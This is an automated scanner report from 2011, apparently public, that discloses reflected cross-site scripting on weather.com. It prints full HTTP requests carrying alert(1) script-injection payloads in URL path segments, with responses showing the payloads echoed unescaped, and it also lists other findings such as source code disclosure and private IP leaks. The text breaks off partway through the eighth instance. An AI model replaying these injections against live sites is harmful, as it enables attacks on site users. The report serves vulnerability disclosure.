XSS, DORK, weather.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 24 12:46:13 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading

1. Cross-site scripting (reflected)

1.1. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]

1.2. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]

1.3. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 2]

1.4. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 3]

1.5. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]

1.6. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]

1.7. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 2]

1.8. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]

1.9. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]

1.10. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 2]

1.11. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]

1.12. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]

1.13. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 2]

1.14. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]

1.15. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]

1.16. http://www.weather.com/pagelet/loc/ [REST URL parameter 2]

1.17. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]

1.18. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]

1.19. http://www.weather.com/pagelet/metrics/ [REST URL parameter 2]

1.20. http://www.weather.com/pagelet/metrics/ [cb parameter]

1.21. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

1.22. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

1.23. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.24. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.25. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.26. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]

1.27. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]

1.28. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]

1.29. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

1.30. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

1.31. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.32. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.33. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

1.34. http://www.weather.com/weather-apps/ [REST URL parameter 1]

1.35. http://www.weather.com/weather-apps/ [REST URL parameter 1]

2. Password field with autocomplete enabled

2.1. http://www.weather.com/activities/driving/rushhour/

2.2. http://www.weather.com/services/desktop.html

2.3. http://www.weather.com/weather/health/beauty/

3. Source code disclosure

3.1. http://www.weather.com/activities/driving/rushhour/

3.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html

3.3. http://www.weather.com/services/desktop.html

4. Cross-domain Referer leakage

4.1. http://www.weather.com/common/a21/makeRequest-2_3.html

4.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html

4.3. http://www.weather.com/pagelet/apps/traffic/

4.4. http://www.weather.com/pagelet/bc/56967

4.5. http://www.weather.com/pagelet/bc/59233

4.6. http://www.weather.com/pagelet/bc/62264

5. Cross-domain script include

5.1. http://www.weather.com/

5.2. http://www.weather.com/activities/driving/rushhour/

5.3. http://www.weather.com/common/a21/makeRequest-2_3.html

5.4. http://www.weather.com/mobile/swap/send_sms_to_phone.html

5.5. http://www.weather.com/pagelet/apps/traffic/

5.6. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

5.7. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico

5.8. http://www.weather.com/services/desktop.html

5.9. http://www.weather.com/weather-apps/

5.10. http://www.weather.com/weather/health/beauty/

6. Private IP addresses disclosed

6.1. http://www.weather.com/activities/driving/rushhour/

6.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html

6.3. http://www.weather.com/services/desktop.html

6.4. http://www.weather.com/weather/health/beauty/

6.5. http://www.weather.com/weather/health/beauty/

7. Content type incorrectly stated

7.1. http://www.weather.com/pagelet/loc/

7.2. http://www.weather.com/pagelet/metrics/


1. Cross-site scripting (reflected)  next
There are 35 instances of this issue:

1.1. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea46"><script>alert(1)</script>7740e17c9d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pageletdea46"><script>alert(1)</script>7740e17c9d7/apps/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 200 OK
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:15 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x04
X-Varnish: 624701992
Date: Thu, 24 Mar 2011 17:40:45 GMT
Connection: keep-alive
Content-Length: 159969

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pageletdea46"><script>alert(1)</script>7740e17c9d7/apps/traffic/" />
...[SNIP]...
1.2. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60609"-alert(1)-"07f39498de7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pagelet60609"-alert(1)-"07f39498de7/apps/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 200 OK
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:21 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1510931970
Date: Thu, 24 Mar 2011 17:40:51 GMT
Connection: keep-alive
Content-Length: 159886

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet60609"-alert(1)-"07f39498de7/apps/traffic/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/
...[SNIP]...
1.3. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16a65"-alert(1)-"f0591b460e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pagelet/apps16a65"-alert(1)-"f0591b460e3/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:55 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x02
X-Varnish: 1156436827
Date: Thu, 24 Mar 2011 17:40:55 GMT
Connection: keep-alive
Content-Length: 108354

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/apps16a65"-alert(1)-"f0591b460e3/traffic/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...
1.4. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9696c"-alert(1)-"545c7e9406c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pagelet/apps/traffic9696c"-alert(1)-"545c7e9406c/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:46:00 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x03
X-Varnish: 1510934940
Date: Thu, 24 Mar 2011 17:41:00 GMT
Connection: keep-alive
Content-Length: 108353

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
{
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/apps/traffic9696c"-alert(1)-"545c7e9406c/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...
1.5. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/56967

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51f6"><script>alert(1)</script>1529b7c1906 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletb51f6"><script>alert(1)</script>1529b7c1906/bc/56967? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:35:56 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x04
X-Varnish: 1156332345
Date: Thu, 24 Mar 2011 17:35:26 GMT
Connection: keep-alive
Content-Length: 159912

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pageletb51f6"><script>alert(1)</script>1529b7c1906/bc/56967" />
...[SNIP]...
1.6. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/56967

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd82"-alert(1)-"370523ec97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82"-alert(1)-"370523ec97/bc/56967? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:01 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 2184623889
Date: Thu, 24 Mar 2011 17:35:31 GMT
Connection: keep-alive
Content-Length: 159760

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert(1)-"370523ec97/bc/56967",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...
1.7. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/56967

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85c3d"-alert(1)-"a5d5445c482 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/bc85c3d"-alert(1)-"a5d5445c482/56967? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:40:36 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 1096913262
Date: Thu, 24 Mar 2011 17:35:36 GMT
Connection: keep-alive
Content-Length: 108349

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/bc85c3d"-alert(1)-"a5d5445c482/56967",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...
1.8. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/59233

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0323"><script>alert(1)</script>8da94951a16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletd0323"><script>alert(1)</script>8da94951a16/bc/59233? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/services/desktop.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
